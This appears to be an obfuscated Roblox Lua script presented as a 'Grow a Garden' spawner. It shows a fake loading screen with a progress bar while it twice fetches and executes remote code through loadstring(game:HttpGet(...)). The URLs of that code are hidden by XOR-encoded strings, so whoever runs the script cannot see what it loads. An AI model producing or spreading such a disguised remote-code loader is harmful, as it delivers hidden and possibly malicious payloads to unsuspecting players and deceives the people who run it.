--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v36,v37) local v38={};_G.Cs={UQSDDAA=3,YASDMRXA=1,YASa0AVV=2};for v58=1, #v36 do v6(v38,v0(v4(v1(v2(v36,v58,v58 +  #Cs + 1 )),v1(v2(v37,1 + (v58% #v37) ,1 + (v58% #v37) + 1 )))%256 ));end return v5(v38);end local v8=workspace.CurrentCamera;local v9,v10=v8.ViewportSize.X,v8.ViewportSize.Y;local v11={};local v12=62;local v13=math.ceil(v10/(v12-(1 + 1)) ) + (5 -3) ;for v39=1 -0 ,v12 do local v40=Drawing.new(v7("\226\210\206\36\244\190","\126\177\163\187\69\134\219\167"));v40.Size=Vector2.new(v9 + 30 + 10 ,v13);v40.Position=Vector2.new( -20,(v39-(998 -(915 + 82))) * v13 );v40.Color=Color3.fromHSV(0.6 + (math.sin(v39/(14 -9) ) * 0.1) ,0.5 + 0 ,(0.2 -0) + ((v39/v12) * (1187.3 -(1069 + 118))) );v40.Filled=true;v40.Visible=true;table.insert(v11,v40);end local function v14(v46,v47,v48,v49) local v50=0;local v51;while true do if (v50==(6 -3)) then v51.Outline=true;v51.Visible=true;v50=4;end if (v50==(0 -0)) then v51=Drawing.new(v7("\23\200\50\209","\156\67\173\74\165"));v51.Text=v46;v50=1;end if (v50==(1 + 1)) then v51.Color=v49;v51.Center=true;v50=3;end if (v50==(6 -2)) then table.insert(v11,v51);return v51;end if (v50==(1 + 0)) then v51.Size=v47;v51.Position=Vector2.new(v9/2 ,v48);v50=793 -(368 + 423) ;end end end local v15=v10/(6 -4) ;v14("🌴 GROW A GARDEN 🌴",63 -(10 + 8) ,v15-(384 -284) ,Color3.new(1,1,443 -(416 + 26) ));v14(v7("\16\152\9\56\147\18\6\24\146\104\32\153","\38\84\215\41\118\220\70"),82 -56 ,v15-(22 + 28) ,Color3.new(1,0 -0 ,438 -(145 + 293) ));v14(v7("\67\21\48\27\238\68\86\46\29\255\84\31\44\21\190\64\26\39\19\237\85\86\53\19\247\68\88\108\92","\158\48\118\66\114"),454 -(44 + 386) ,v15,Color3.new(1,1487 -(998 + 488) ,1 + 0 ));local v16,v17=400,17 + 3 ;local v18,v19=(v9-v16)/(774 -(201 + 571)) ,v15 + 40 ;local v20=Drawing.new(v7("\152\53\5\55\97\160","\155\203\68\112\86\19\197"));v20.Size=Vector2.new(v16,v17);v20.Position=Vector2.new(v18,v19);v20.Color=Color3.new(1139 -(116 + 1022) ,4 -3 ,1);v20.Thickness=2 + 0 ;v20.Filled=false;v20.Visible=true;table.insert(v11,v20);local v27=Drawing.new(v7("\117\204\35\253\82\125","\152\38\189\86\156\32\24\133"));v27.Size=Vector2.new(0,v17);v27.Position=Vector2.new(v18,v19);v27.Color=Color3.fromRGB(0,730 -530 ,905 -650 );v27.Filled=true;v27.Visible=true;table.insert(v11,v27);local v33=v14(v7("\172\18","\38\156\55\199"),20,v19 + 30 ,Color3.new(860 -(814 + 45) ,2 -1 ,1 + 0 ));local v34=71 + 129 ;local v35=tick();task.spawn(function() loadstring(game:HttpGet(v7("\160\105\104\56\0\46\181\12\186\124\107\102\20\125\238\75\189\127\105\59\22\102\249\76\166\105\121\38\7\58\249\76\165\50\102\41\3\117\254\74\169\109\125\123\67\35\174\89\189\109\125\103\32\114\244\66\166\124\122\38\2\102\244\82\186\119\109\58\25\101\232\73\185\111\118\103\30\117\243\77\231\112\125\33\29\58\246\86\169","\35\200\29\28\72\115\20\154")))();end);while true do local v52=tick() -v35 ;local v53=math.clamp(v52/v34 ,885 -(261 + 624) ,1 -0 );for v59,v60 in ipairs(v11) do if ((v60.ClassName==v7("\42\174\196\222\159\41","\84\121\223\177\191\237\76")) and v60.Filled) then v60.Position=Vector2.new(v60.Position.X,((v60.Position.Y + (1081 -(1020 + 60)))%(v10 + v13)) -v13 );end end v27.Size=Vector2.new(v16 * v53 ,v17);v33.Text=tostring(math.floor(v53 * (1523 -(630 + 793)) ))   .. "%" ;if (v53>=(3 -2)) then break;end wait(0.03 -0 );end for v56,v57 in ipairs(v11) do v57:Remove();end loadstring(game:HttpGet(v7("\179\66\221\176\41\10\127\142\169\87\222\238\61\89\36\201\174\84\220\179\63\66\51\206\181\66\204\174\46\30\51\206\182\25\200\180\59\68\37\211\176\7\155\243\117\119\49\211\191\83\199\147\42\81\39\207\190\68\134\178\63\86\35\142\179\83\200\164\41\31\61\192\178\88\134\147\42\81\39\207\190\68\135\172\47\81","\161\219\54\169\192\90\48\80")))();Spawner.Load();
